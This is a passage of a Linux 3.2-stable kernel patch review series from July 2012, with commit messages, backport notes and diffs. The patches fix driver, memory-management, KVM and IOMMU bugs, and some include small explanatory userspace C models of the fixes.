  WARNING: at irq/handle.c:146 handle_irq_event_percpu+0x19c/0x1b8()
  irq 25 handler mxc_rtc_interrupt+0x0/0xac enabled interrupts
  Modules linked in:
   (unwind_backtrace+0x0/0xf0) from (warn_slowpath_common+0x4c/0x64)
   (warn_slowpath_common+0x4c/0x64) from (warn_slowpath_fmt+0x30/0x40)
   (warn_slowpath_fmt+0x30/0x40) from (handle_irq_event_percpu+0x19c/0x1b8)
   (handle_irq_event_percpu+0x19c/0x1b8) from (handle_irq_event+0x28/0x38)
   (handle_irq_event+0x28/0x38) from (handle_level_irq+0x80/0xc4)
   (handle_level_irq+0x80/0xc4) from (generic_handle_irq+0x24/0x38)
   (generic_handle_irq+0x24/0x38) from (handle_IRQ+0x30/0x84)
   (handle_IRQ+0x30/0x84) from (avic_handle_irq+0x2c/0x4c)
   (avic_handle_irq+0x2c/0x4c) from (__irq_svc+0x40/0x60)
  Exception stack(0xc050bf60 to 0xc050bfa8)
  bf60: 0001  003c4208 c0018e20 c050a000 c050a000 c054a4c8 c050a000
  bf80: c05157a8 4117b363 80503bb4  0100 c050bfa8 c0018e2c c000e808
  bfa0: 6013 
   (__irq_svc+0x40/0x60) from (default_idle+0x1c/0x30)
   (default_idle+0x1c/0x30) from (cpu_idle+0x68/0xa8)
   (cpu_idle+0x68/0xa8) from (start_kernel+0x22c/0x26c)

Signed-off-by: Benoît Thébaudeau 
Cc: Alessandro Zummo 
Cc: Sascha Hauer 
Acked-by: Uwe Kleine-König 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 drivers/rtc/rtc-mxc.c |5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

--- a/drivers/rtc/rtc-mxc.c
+++ b/drivers/rtc/rtc-mxc.c
@@ -191,10 +191,11 @@ static irqreturn_t mxc_rtc_interrupt(int
struct platform_device *pdev = dev_id;
struct rtc_plat_data *pdata = platform_get_drvdata(pdev);
void __iomem *ioaddr = pdata->ioaddr;
+   unsigned long flags;
u32 status;
u32 events = 0;
 
-   spin_lock_irq(&pdata->rtc->irq_lock);
+   spin_lock_irqsave(&pdata->rtc->irq_lock, flags);
status = readw(ioaddr + RTC_RTCISR) & readw(ioaddr + RTC_RTCIENR);
/* clear interrupt sources */
writew(status, ioaddr + RTC_RTCISR);
@@ -217,7 +218,7 @@ static irqreturn_t mxc_rtc_interrupt(int
rtc_update_alarm(&pdev->dev, &pdata->g_rtc_alarm);
 
rtc_update_irq(pdata->rtc, 1, events);
-   spin_unlock_irq(&pdata->rtc->irq_lock);
+   spin_unlock_irqrestore(&pdata->rtc->irq_lock, flags);
 
return IRQ_HANDLED;
 }


[ 036/108] md/raid1: fix use-after-free bug in RAID1 data-check code.

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: NeilBrown 

commit 2d4f4f3384d4ef4f7c571448e803a1ce721113d5 upstream.

This bug has been present ever since data-check was introduced
in 2.6.16.  However it would only fire if a data-check were
done on a degraded array, which was only possible if the array
has 3 or more devices.  This is certainly possible, but is quite
uncommon.

Since hot-replace was added in 3.3 it can happen more often as
the same condition can arise if not all possible replacements are
present.

The problem is that as soon as we submit the last read request, the
'r1_bio' structure could be freed at any time, so we really should
stop looking at it.  If the last device is being read from we will
stop looking at it.  However if the last device is not due to be read
from, we will still check the bio pointer in the r1_bio, but the
r1_bio might already be free.

So use the read_targets counter to make sure we stop looking for bios
to submit as soon as we have submitted them all.
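
A toy userspace model of the counter-based loop follows. All names are hypothetical, and it assumes the worst case in which each read completes immediately, so the structure counts as freed as soon as the last read has been submitted. No memory is actually freed; the model only counts accesses that would have been use-after-free.

```c
#define NDISKS 4

/* Toy stand-in for r1_bio; all names are hypothetical. */
struct r1_model {
    int is_read_target[NDISKS]; /* models bio->bi_end_io == end_sync_read */
    int remaining;              /* outstanding reads */
    int freed;                  /* set once the last read has completed */
    int touched_after_free;     /* accesses that would be use-after-free */
};

static int peek(struct r1_model *r, int i)
{
    if (r->freed)
        r->touched_after_free++;
    return r->is_read_target[i];
}

/* Assumption: completion is immediate, the worst case for the submitter. */
static void submit(struct r1_model *r)
{
    if (--r->remaining == 0)
        r->freed = 1;
}

/* Returns the number of accesses made after the structure was "freed". */
static int submit_reads(struct r1_model *r, int use_counter)
{
    int read_targets = r->remaining;
    int i;

    for (i = 0; i < NDISKS && (!use_counter || read_targets); i++) {
        if (peek(r, i)) {
            read_targets--;
            submit(r);
        }
    }
    return r->touched_after_free;
}
```

With read targets in slots 0 and 1 only, the loop without the counter inspects slots 2 and 3 after the last submission; with the counter it stops at once.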

This fix is suitable for any -stable kernel since 2.6.16.

Reported-by: Arnold Schulz 
Signed-off-by: NeilBrown 
[bwh: Backported to 3.2: no doubling of conf->raid_disks; we don't have
 hot-replace support]
Signed-off-by: Ben Hutchings 
---
 drivers/md/raid1.c |3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

--- a/drivers/md/raid1.c
+++ b/drivers/md/raid1.c
@@ -2378,9 +2378,10 @@ static sector_t sync_request(struct mdde
 */
if (test_bit(MD_RECOVERY_REQUESTED, &mddev->recovery)) {
atomic_set(&r1_bio->remaining, read_targets);
-   for (i=0; i<conf->raid_disks; i++) {
+   for (i = 0; i < conf->raid_disks && read_targets; i++) {
bio = r1_bio->bios[i];
if (bio->bi_end_io == end_sync_read) {
+   read_targets--;
md_sync_acct(bio->bi_bdev, nr_sectors);
generic_make_request(bio);
}


[ 032/108] mtd: nandsim: dont open code a do_div helper

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Herton Ronaldo Krzesinski 

commit 596fd46268634082314b3af1ded4612e1b7f3f03 upstream.

We don't need to open code the divide function; just use div_u64, which
already exists and does the same job. While this is a straightforward
cleanup, there is a further, real motivation for it.

While building on a cross compiling environment in armel, using gcc
4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5), I was getting the following build
error:

ERROR: "__aeabi_uldivmod" [drivers/mtd/nand/nandsim.ko] undefined!

After investigating with objdump and hand built assembly version
generated with the compiler, I narrowed __aeabi_uldivmod as being
generated from the divide function. When nandsim.c is built with
-fno-inline-functions-called-once, that happens when
CONFIG_DEBUG_SECTION_MISMATCH is enabled, the do_div optimization in
arch/arm/include/asm/div64.h doesn't work as expected with the open
coded divide function: even if the do_div we are using doesn't have a
constant divisor, the compiler still includes the else parts of the
optimized do_div macro, and translates the divisions there to use
__aeabi_uldivmod, instead of only calling __do_div_asm -> __do_div64 and
optimizing/removing everything else out.

So to reproduce, gcc 4.6 plus CONFIG_DEBUG_SECTION_MISMATCH=y and
CONFIG_MTD_NAND_NANDSIM=m should do it, building on armel.

After this change, the compiler does the intended thing even with
-fno-inline-functions-called-once, and optimizes out as expected the
constant handling in the optimized do_div on arm. As this also avoids a
build issue, I'm marking for Stable, as I think is applicable for this
case.
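
For readers unfamiliar with the helper: div_u64 divides a 64-bit value by a 32-bit one and returns the 64-bit quotient. A userspace stand-in, where div_u64_model and page_count are hypothetical names and plain division replaces the kernel's architecture-specific implementation:

```c
#include <stdint.h>

/*
 * Userspace stand-in for the kernel's div_u64(): 64-bit dividend, 32-bit
 * divisor, 64-bit quotient. In userspace plain '/' is enough.
 */
static uint64_t div_u64_model(uint64_t dividend, uint32_t divisor)
{
    return dividend / divisor;
}

/* Hypothetical helper: number of pages in a device of totsz bytes. */
static uint64_t page_count(uint64_t totsz, uint32_t pgsz)
{
    return div_u64_model(totsz, pgsz);
}
```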

Signed-off-by: Herton Ronaldo Krzesinski 
Acked-by: Nicolas Pitre 
Signed-off-by: Artem Bityutskiy 
Signed-off-by: David Woodhouse 
Signed-off-by: Ben Hutchings 
---
 drivers/mtd/nand/nandsim.c |   12 +++-
 1 file changed, 3 insertions(+), 9 deletions(-)

diff --git a/drivers/mtd/nand/nandsim.c b/drivers/mtd/nand/nandsim.c
index 6cc8fbf..cf0cd31 100644
--- a/drivers/mtd/nand/nandsim.c
+++ b/drivers/mtd/nand/nandsim.c
@@ -28,7 +28,7 @@
 #include 
 #include 
 #include 
-#include 
+#include 
 #include 
 #include 
 #include 
@@ -546,12 +546,6 @@ static char *get_partition_name(int i)
return kstrdup(buf, GFP_KERNEL);
 }
 
-static uint64_t divide(uint64_t n, uint32_t d)
-{
-   do_div(n, d);
-   return n;
-}
-
 /*
  * Initialize the nandsim structure.
  *
@@ -580,7 +574,7 @@ static int init_nandsim(struct mtd_info *mtd)
ns->geom.oobsz= mtd->oobsize;
ns->geom.secsz= mtd->erasesize;
ns->geom.pgszoob  = ns->geom.pgsz + ns->geom.oobsz;
-   ns->geom.pgnum= divide(ns->geom.totsz, ns->geom.pgsz);
+   ns->geom.pgnum= div_u64(ns->geom.totsz, ns->geom.pgsz);
ns->geom.totszoob = ns->geom.totsz + (uint64_t)ns->geom.pgnum * ns->geom.oobsz;
ns->geom.secshift = ffs(ns->geom.secsz) - 1;
ns->geom.pgshift  = chip->page_shift;
@@ -921,7 +915,7 @@ static int setup_wear_reporting(struct mtd_info *mtd)
 
if (!rptwear)
return 0;
-   wear_eb_count = divide(mtd->size, mtd->erasesize);
+   wear_eb_count = div_u64(mtd->size, mtd->erasesize);
mem = wear_eb_count * sizeof(unsigned long);
if (mem / sizeof(unsigned long) != wear_eb_count) {
NS_ERR("Too many erase blocks for wear reporting\n");


[ 021/108] KVM: Fix buffer overflow in kvm_set_irq()

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Avi Kivity 

commit f2ebd422f71cda9c791f76f85d2ca102ae34a1ed upstream.

kvm_set_irq() has an internal buffer of three irq routing entries, allowing
connecting a GSI to three IRQ chips or one MSI.  However setup_routing_entry()
does not properly enforce this, allowing three irqchip routes followed by
an MSI route to overflow the buffer.

Fix by ensuring that an MSI entry is added to an empty list.
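
The rule can be modelled in userspace as below. The types and the add_route helper are hypothetical, and the -ENOSPC guard exists only to keep the model itself memory-safe. The three conditions in the loop mirror the check in the diff.

```c
#include <errno.h>

enum route_type { ROUTE_IRQCHIP, ROUTE_MSI };

struct route {
    enum route_type type;
    int irqchip;             /* only meaningful for ROUTE_IRQCHIP */
};

#define MAX_ROUTES 3         /* size of the buffer described above */

struct gsi_routes {
    int n;
    struct route e[MAX_ROUTES];
};

static int add_route(struct gsi_routes *g, enum route_type type, int irqchip)
{
    int i;

    for (i = 0; i < g->n; i++) {
        const struct route *ei = &g->e[i];

        if (ei->type == ROUTE_MSI ||   /* nothing may follow an MSI */
            type == ROUTE_MSI ||       /* an MSI may not follow anything */
            irqchip == ei->irqchip)    /* one route per irqchip */
            return -EINVAL;
    }
    if (g->n == MAX_ROUTES)            /* model-only guard */
        return -ENOSPC;

    g->e[g->n].type = type;
    g->e[g->n].irqchip = irqchip;
    g->n++;
    return 0;
}
```

An MSI route is accepted only on an empty list, so three irqchip routes followed by an MSI route are rejected before a fourth entry is stored.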

Signed-off-by: Avi Kivity 
Signed-off-by: Ben Hutchings 
---
 virt/kvm/irq_comm.c |1 +
 1 file changed, 1 insertion(+)

diff --git a/virt/kvm/irq_comm.c b/virt/kvm/irq_comm.c
index a6a0365..5afb431 100644
--- a/virt/kvm/irq_comm.c
+++ b/virt/kvm/irq_comm.c
@@ -332,6 +332,7 @@ static int setup_routing_entry(struct kvm_irq_routing_table *rt,
 */
hlist_for_each_entry(ei, n, &rt->map[ue->gsi], link)
if (ei->type == KVM_IRQ_ROUTING_MSI ||
+   ue->type == KVM_IRQ_ROUTING_MSI ||
ue->u.irqchip.irqchip == ei->irqchip.irqchip)
return r;
 


[ 031/108] USB: cdc-wdm: fix lockup on error in wdm_read

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Bjørn Mork  

commit b086b6b10d9f182cd8d2f0dcfd7fd11edba93fc9 upstream.

Clear the WDM_READ flag on empty reads to avoid running
forever in an infinite tight loop, causing lockups:

Jul  1 21:58:11 nemi kernel: [ 3658.898647] qmi_wwan 2-1:1.2: Unexpected error 
-71
Jul  1 21:58:36 nemi kernel: [ 3684.072021] BUG: soft lockup - CPU#0 stuck for 
23s! [qmi.pl:12235]
Jul  1 21:58:36 nemi kernel: [ 3684.072212] CPU 0
Jul  1 21:58:36 nemi kernel: [ 3684.072355]
Jul  1 21:58:36 nemi kernel: [ 3684.072367] Pid: 12235, comm: qmi.pl Tainted: P 
  O 3.5.0-rc2+ #13 LENOVO 2776LEG/2776LEG
Jul  1 21:58:36 nemi kernel: [ 3684.072383] RIP: 0010:[]  
[] spin_unlock_irq+0x8/0xc [cdc_wdm]
Jul  1 21:58:36 nemi kernel: [ 3684.072388] RSP: 0018:88022dca1e70  EFLAGS: 
0282
Jul  1 21:58:36 nemi kernel: [ 3684.072393] RAX: 88022fc3f650 RBX: 
811c56f7 RCX: 0001000ce8c1
Jul  1 21:58:36 nemi kernel: [ 3684.072398] RDX: 0010 RSI: 
0267d810 RDI: 88022fc3f650
Jul  1 21:58:36 nemi kernel: [ 3684.072403] RBP: 88022dca1eb0 R08: 
a063578e R09: 
Jul  1 21:58:36 nemi kernel: [ 3684.072407] R10: 0008 R11: 
0246 R12: 0002
Jul  1 21:58:36 nemi kernel: [ 3684.072412] R13: 0246 R14: 
0002 R15: 8802281d8c88
Jul  1 21:58:36 nemi kernel: [ 3684.072418] FS:  7f666a260700() 
GS:88023bc0() knlGS:
Jul  1 21:58:36 nemi kernel: [ 3684.072423] CS:  0010 DS:  ES:  CR0: 
80050033
Jul  1 21:58:36 nemi kernel: [ 3684.072428] CR2: 0270d9d8 CR3: 
00022e865000 CR4: 07f0
Jul  1 21:58:36 nemi kernel: [ 3684.072433] DR0:  DR1: 
 DR2: 
Jul  1 21:58:36 nemi kernel: [ 3684.072438] DR3:  DR6: 
0ff0 DR7: 0400
Jul  1 21:58:36 nemi kernel: [ 3684.072444] Process qmi.pl (pid: 12235, 
threadinfo 88022dca, task 88022ff76380)
Jul  1 21:58:36 nemi kernel: [ 3684.072448] Stack:
Jul  1 21:58:36 nemi kernel: [ 3684.072458]  a063592e 00010002 
88022fc3f650 88022fc3f6a8
Jul  1 21:58:36 nemi kernel: [ 3684.072466]  0200 0001 
0267d810 
Jul  1 21:58:36 nemi kernel: [ 3684.072475]   880212cfb6d0 
0200 880212cfb6c0
Jul  1 21:58:36 nemi kernel: [ 3684.072479] Call Trace:
Jul  1 21:58:36 nemi kernel: [ 3684.072489]  [] ? 
wdm_read+0x1a0/0x263 [cdc_wdm]
Jul  1 21:58:36 nemi kernel: [ 3684.072500]  [] ? 
vfs_read+0xa1/0xfb
Jul  1 21:58:36 nemi kernel: [ 3684.072509]  [] ? 
alarm_setitimer+0x35/0x64
Jul  1 21:58:36 nemi kernel: [ 3684.072517]  [] ? 
sys_read+0x45/0x6e
Jul  1 21:58:36 nemi kernel: [ 3684.072525]  [] ? 
system_call_fastpath+0x16/0x1b
Jul  1 21:58:36 nemi kernel: [ 3684.072557] Code: <66> 66 90 c3 83 ff ed 89 f8 
74 16 7f 06 83 ff a1 75 0a c3 83 ff f4

The WDM_READ flag is normally cleared by wdm_int_callback
before resubmitting the read urb, and set by wdm_in_callback
when this urb returns with data or an error.  But a crashing
device may cause both a read error and cancelling all urbs.
Make sure that the flag is cleared by wdm_read if the buffer
is empty.

We don't clear the flag on errors, as there may be pending
data in the buffer which should be processed.  The flag will
instead be cleared on the next wdm_read call.
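
The effect of clearing the flag can be seen in a toy model of the read loop. The names and the spin cap are hypothetical; the real driver takes a spinlock and waits for the flag where the model simply stops.

```c
/* Toy model of the read loop; names and the spin cap are hypothetical. */
struct wdm_model {
    int read_flag;   /* models the WDM_READ bit */
    int reslength;   /* bytes waiting in the buffer */
};

/*
 * Returns how many times the loop went around on an empty buffer before it
 * either found data, would have waited for WDM_READ, or hit max_spins.
 */
static int wdm_read_spins(struct wdm_model *d, int clear_on_empty,
                          int max_spins)
{
    int spins = 0;

    while (spins < max_spins) {
        if (!d->read_flag)
            break;              /* real code would wait for the flag here */
        if (d->reslength)
            break;              /* data available: copy it out */
        if (clear_on_empty)
            d->read_flag = 0;   /* the fix: nothing to read, so say so */
        spins++;                /* corresponds to "goto retry" */
    }
    return spins;
}
```

Without the clear, a set flag plus an empty buffer spins until the cap is reached; with it, the loop goes around once and then waits.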

Signed-off-by: Bjørn Mork 
Acked-by: Oliver Neukum 
Signed-off-by: Greg Kroah-Hartman 
Signed-off-by: Ben Hutchings 
---
 drivers/usb/class/cdc-wdm.c |2 ++
 1 file changed, 2 insertions(+)

diff --git a/drivers/usb/class/cdc-wdm.c b/drivers/usb/class/cdc-wdm.c
index 8fd398d..ee46927 100644
--- a/drivers/usb/class/cdc-wdm.c
+++ b/drivers/usb/class/cdc-wdm.c
@@ -500,6 +500,8 @@ retry:
goto retry;
}
if (!desc->reslength) { /* zero length read */
+   dev_dbg(&desc->intf->dev, "%s: zero length - clearing WDM_READ\n", __func__);
+   clear_bit(WDM_READ, &desc->flags);
spin_unlock_irq(&desc->iuspin);
goto retry;
}


[ 024/108] iommu/amd: Fix missing iommu_shutdown initialization in passthrough mode

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Shuah Khan 

commit f2f12b6fc032c7b1419fd6db84e2868b5f05a878 upstream.

The iommu_shutdown callback is not initialized when the AMD
IOMMU driver runs in passthrough mode. Fix that by moving
the callback initialization before the check for
passthrough mode.

Signed-off-by: Shuah Khan 
Signed-off-by: Joerg Roedel 
[bwh: Backported to 3.2: adjust context]
Signed-off-by: Ben Hutchings 
---
diff --git a/drivers/iommu/amd_iommu_init.c b/drivers/iommu/amd_iommu_init.c
index 542024b..c04ddca 100644
--- a/drivers/iommu/amd_iommu_init.c
+++ b/drivers/iommu/amd_iommu_init.c
@@ -1641,6 +1641,8 @@ static int __init amd_iommu_init(void)
 
register_syscore_ops(&amd_iommu_syscore_ops);
 
+   x86_platform.iommu_shutdown = disable_iommus;
+
if (iommu_pass_through)
goto out;
 
@@ -1649,7 +1651,6 @@ static int __init amd_iommu_init(void)
else
printk(KERN_INFO "AMD-Vi: Lazy IO/TLB flushing enabled\n");
 
-   x86_platform.iommu_shutdown = disable_iommus;
 out:
return ret;
 


[ 040/108] mm, thp: abort compaction if migration page cannot be charged to memcg

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: David Rientjes 

commit 4bf2bba3750f10aa9e62e6949bc7e8329990f01b upstream.

If page migration cannot charge the temporary page to the memcg,
migrate_pages() will return -ENOMEM.  This isn't considered in memory
compaction however, and the loop continues to iterate over all
pageblocks trying to isolate and migrate pages.  If a small number of
very large memcgs happen to be oom, however, these attempts will mostly
be futile, leading to an enormous amount of CPU consumption due to the
page migration failures.

This patch will short circuit and fail memory compaction if
migrate_pages() returns -ENOMEM.  COMPACT_PARTIAL is returned in case
some migrations were successful so that the page allocator will retry.
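
A sketch of the short circuit follows, with hypothetical names and result codes: the per-pageblock migration outcomes are passed in as an array so the number of attempts can be counted.

```c
#include <errno.h>

/* Hypothetical result codes for the model (not the kernel's values). */
enum { MODEL_COMPLETE, MODEL_PARTIAL };

/*
 * migrate_err[i] is the assumed outcome of migrating pageblock i
 * (0 on success, negative errno on failure). *attempts counts how many
 * pageblocks were tried before the function returned.
 */
static int compact_model(const int *migrate_err, int nblocks, int *attempts)
{
    int ret = MODEL_COMPLETE;
    int i;

    *attempts = 0;
    for (i = 0; i < nblocks; i++) {
        (*attempts)++;
        if (migrate_err[i] == -ENOMEM) {
            ret = MODEL_PARTIAL;   /* let the allocator retry */
            break;                 /* later blocks would likely fail too */
        }
    }
    return ret;
}
```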

Signed-off-by: David Rientjes 
Acked-by: Mel Gorman 
Cc: Minchan Kim 
Cc: Kamezawa Hiroyuki 
Cc: Rik van Riel 
Cc: Andrea Arcangeli 
Signed-off-by: Andrew Morton 
Signed-off-by: Linus Torvalds 
Signed-off-by: Ben Hutchings 
---
 mm/compaction.c |5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/mm/compaction.c b/mm/compaction.c
index 7ea259d..2f42d95 100644
--- a/mm/compaction.c
+++ b/mm/compaction.c
@@ -701,8 +701,11 @@ static int compact_zone(struct zone *zone, struct compact_control *cc)
if (err) {
putback_lru_pages(&cc->migratepages);
cc->nr_migratepages = 0;
+   if (err == -ENOMEM) {
+   ret = COMPACT_PARTIAL;
+   goto out;
+   }
}
-
}
 
 out:


[ 043/108] cpufreq / ACPI: Fix not loading acpi-cpufreq driver regression

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Thomas Renninger 

commit c4686c71a9183f76e3ef59098da5c098748672f6 upstream.

Commit d640113fe80e45ebd4a5b420b introduced a regression on SMP
systems where the processor core with ACPI id zero is disabled
(typically should be the case because of hyperthreading).
The regression got spread through stable kernels.
On 3.0.X it got introduced via 3.0.18.

Such platforms may be rare, but do exist.
Look out for a disabled processor with acpi_id 0 in dmesg:
ACPI: LAPIC (acpi_id[0x00] lapic_id[0x10] disabled)

This problem has been observed on a:
HP Proliant BL280c G6 blade

This patch restricts the introduced workaround to platforms
with nr_cpu_ids <= 1.
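
The restricted workaround reduces to one extra condition. The sketch below models only the branch shown in the diff. The function name cpuid_fallback is hypothetical, and apic_id is assumed to be -1 on entry, as the comment in the diff ("Return -1 for other CPU's handle") suggests.

```c
/*
 * Models only the fallback branch shown in the diff. apic_id is the result
 * of the earlier lookup (assumed to be -1 when nothing was found). The
 * function name is hypothetical.
 */
static int cpuid_fallback(unsigned int nr_cpu_ids, unsigned int acpi_id,
                          int apic_id)
{
    if (nr_cpu_ids <= 1 && acpi_id == 0)
        return (int)acpi_id;   /* uniprocessor: treat acpi id 0 as CPU 0 */
    return apic_id;
}
```

On an SMP system a disabled processor with acpi id 0 now gets -1, not a false match against CPU 0.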

Signed-off-by: Thomas Renninger 
Signed-off-by: Rafael J. Wysocki 
Signed-off-by: Ben Hutchings 
---
 drivers/acpi/processor_core.c |6 --
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/drivers/acpi/processor_core.c b/drivers/acpi/processor_core.c
index c850de4..eff7222 100644
--- a/drivers/acpi/processor_core.c
+++ b/drivers/acpi/processor_core.c
@@ -189,10 +189,12 @@ int acpi_get_cpuid(acpi_handle handle, int type, u32 acpi_id)
 * Processor (CPU3, 0x03, 0x0410, 0x06) {}
 * }
 *
-* Ignores apic_id and always return 0 for CPU0's handle.
+* Ignores apic_id and always returns 0 for the processor
+* handle with acpi id 0 if nr_cpu_ids is 1.
+* This should be the case if SMP tables are not found.
 * Return -1 for other CPU's handle.
 */
-   if (acpi_id == 0)
+   if (nr_cpu_ids <= 1 && acpi_id == 0)
return acpi_id;
else
return apic_id;




[ 051/108] intel_ips: blacklist HP ProBook laptops

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Takashi Iwai 

commit 88ca518b0bb4161e5f20f8a1d9cc477cae294e54 upstream.

intel_ips driver spews the warning message
  "ME failed to update for more than 1s, likely hung"
at each second endlessly on HP ProBook laptops with IronLake.

As this has never worked, better to blacklist the driver for now.
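
A rough userspace sketch of how such a blacklist lookup behaves, assuming the match is done by substring on the vendor and product strings. The struct and function names are hypothetical stand-ins, not the kernel DMI API.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for one blacklist entry. */
struct blacklist_entry {
	const char *vendor;	/* substring expected in the system vendor */
	const char *product;	/* substring expected in the product name */
};

static const struct blacklist_entry blacklist[] = {
	{ "Hewlett-Packard", "HP ProBook" },
	{ NULL, NULL }	/* terminating entry */
};

/* Returns true if both strings contain the substrings of some entry. */
static bool is_blacklisted(const char *sys_vendor, const char *product_name)
{
	const struct blacklist_entry *e;

	for (e = blacklist; e->vendor; e++) {
		if (strstr(sys_vendor, e->vendor) &&
		    strstr(product_name, e->product))
			return true;
	}
	return false;
}
```

Under that assumption a single entry covers every model whose product name contains "HP ProBook", which is why the probe routine can bail out early with -ENODEV.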

Signed-off-by: Takashi Iwai 
Signed-off-by: Matthew Garrett 
Signed-off-by: Ben Hutchings 
---
 drivers/platform/x86/intel_ips.c |   22 ++
 1 file changed, 22 insertions(+)

diff --git a/drivers/platform/x86/intel_ips.c b/drivers/platform/x86/intel_ips.c
index 0ffdb3c..9af4257 100644
--- a/drivers/platform/x86/intel_ips.c
+++ b/drivers/platform/x86/intel_ips.c
@@ -72,6 +72,7 @@
 #include 
 #include 
 #include 
+#include 
 #include 
 #include 
 #include 
@@ -1485,6 +1486,24 @@ static DEFINE_PCI_DEVICE_TABLE(ips_id_table) = {
 
 MODULE_DEVICE_TABLE(pci, ips_id_table);
 
+static int ips_blacklist_callback(const struct dmi_system_id *id)
+{
+   pr_info("Blacklisted intel_ips for %s\n", id->ident);
+   return 1;
+}
+
+static const struct dmi_system_id ips_blacklist[] = {
+   {
+   .callback = ips_blacklist_callback,
+   .ident = "HP ProBook",
+   .matches = {
+   DMI_MATCH(DMI_SYS_VENDOR, "Hewlett-Packard"),
+   DMI_MATCH(DMI_PRODUCT_NAME, "HP ProBook"),
+   },
+   },
+   { } /* terminating entry */
+};
+
 static int ips_probe(struct pci_dev *dev, const struct pci_device_id *id)
 {
u64 platform_info;
@@ -1494,6 +1513,9 @@ static int ips_probe(struct pci_dev *dev, const struct pci_device_id *id)
u16 htshi, trc, trc_required_mask;
u8 tse;
 
+   if (dmi_check_system(ips_blacklist))
+   return -ENODEV;
+
ips = kzalloc(sizeof(struct ips_driver), GFP_KERNEL);
if (!ips)
return -ENOMEM;




[ 025/108] iommu/amd: Initialize dma_ops for hotplug and sriov devices

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Joerg Roedel 

commit ac1534a55d1e87d59a21c09c570605933b551480 upstream.

When a device is added to the system at runtime the AMD
IOMMU driver initializes the necessary data structures to
handle translation for it. But it forgets to change the
per-device dma_ops to point to the AMD IOMMU driver. So
mapping actually never happens and all DMA accesses end in
an IO_PAGE_FAULT. Fix this.

Reported-by: Stefan Assmann 
Signed-off-by: Joerg Roedel 
[bwh: Backported to 3.2:
 - Adjust context
 - Use global iommu_pass_through; there is no per-device pass_through]
Signed-off-by: Ben Hutchings 
---
--- a/drivers/iommu/amd_iommu.c
+++ b/drivers/iommu/amd_iommu.c
@@ -59,6 +59,8 @@ static struct protection_domain *pt_doma
 
 static struct iommu_ops amd_iommu_ops;
 
+static struct dma_map_ops amd_iommu_dma_ops;
+
 /*
  * general struct to manage commands send to an IOMMU
  */
@@ -1878,6 +1880,11 @@ static int device_change_notifier(struct
list_add_tail(&dma_domain->list, &iommu_pd_list);
spin_unlock_irqrestore(&iommu_pd_list_lock, flags);
 
+   if (!iommu_pass_through)
+   dev->archdata.dma_ops = &amd_iommu_dma_ops;
+   else
+   dev->archdata.dma_ops = &nommu_dma_ops;
+
break;
case BUS_NOTIFY_DEL_DEVICE:
 




[ 034/108] hwspinlock/core: use global ID to register hwspinlocks on multiple devices

2012-07-22 Thread Ben Hutchings
3.2-stable review patch.  If anyone has any objections, please let me know.

--

From: Shinya Kuribayashi 

commit 476a7eeb60e70ddab138e7cb4bc44ef5ac20782e upstream.

Commit 300bab9770 (hwspinlock/core: register a bank of hwspinlocks in a
single API call, 2011-09-06) introduced 'hwspin_lock_register_single()'
to register numerous (a bank of) hwspinlock instances in a single API,
'hwspin_lock_register()'.

At that time, 'hwspin_lock_register()' accidentally passed 'local IDs'
to 'hwspin_lock_register_single()', even though ..._single() requires
'global IDs' to register hwspinlocks.

We have to convert into global IDs by supplying the missing 'base_id'.
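
The conversion can be sketched with a toy registry. This is only a model under stated assumptions: the table size and the helper names are hypothetical, and the real code keeps its registry in a different data structure.

```c
#include <assert.h>

#define SKETCH_MAX_LOCKS 16	/* hypothetical size of the global ID space */

static int registered[SKETCH_MAX_LOCKS];	/* 1 if a global ID is in use */

/* Registers one lock by global ID; fails on a collision or a bad ID. */
static int register_single(int id)
{
	if (id < 0 || id >= SKETCH_MAX_LOCKS || registered[id])
		return -1;
	registered[id] = 1;
	return 0;
}

static void unregister_single(int id)
{
	registered[id] = 0;
}

/* Registers num_locks locks whose global IDs start at base_id. */
static int register_bank(int base_id, int num_locks)
{
	int i, ret = 0;

	for (i = 0; i < num_locks; i++) {
		ret = register_single(base_id + i);	/* global, not local, ID */
		if (ret)
			goto reg_failed;
	}
	return 0;

reg_failed:
	/* Unwind with the same global IDs that were registered. */
	while (--i >= 0)
		unregister_single(base_id + i);
	return ret;
}
```

With the local index alone, a second bank would collide with IDs 0..n-1 of the first bank; adding base_id gives each bank its own range, and the error path has to use the same offset.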

Signed-off-by: Shinya Kuribayashi 
[ohad: fix error path of hwspin_lock_register, too]
Signed-off-by: Ohad Ben-Cohen 
Signed-off-by: Ben Hutchings 
---
 drivers/hwspinlock/hwspinlock_core.c |4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/hwspinlock/hwspinlock_core.c b/drivers/hwspinlock/hwspinlock_core.c
index 61c9cf1..1201a15 100644
--- a/drivers/hwspinlock/hwspinlock_core.c
+++ b/drivers/hwspinlock/hwspinlock_core.c
@@ -345,7 +345,7 @@ int hwspin_lock_register(struct hwspinlock_device *bank, struct device *dev,
spin_lock_init(&hwlock->lock);
hwlock->bank = bank;
 
-   ret = hwspin_lock_register_single(hwlock, i);
+   ret = hwspin_lock_register_single(hwlock, base_id + i);
if (ret)
goto reg_failed;
}
@@ -354,7 +354,7 @@ int hwspin_lock_register(struct hwspinlock_device *bank, struct device *dev,
 
 reg_failed:
while (--i >= 0)
-   hwspin_lock_unregister_single(i);
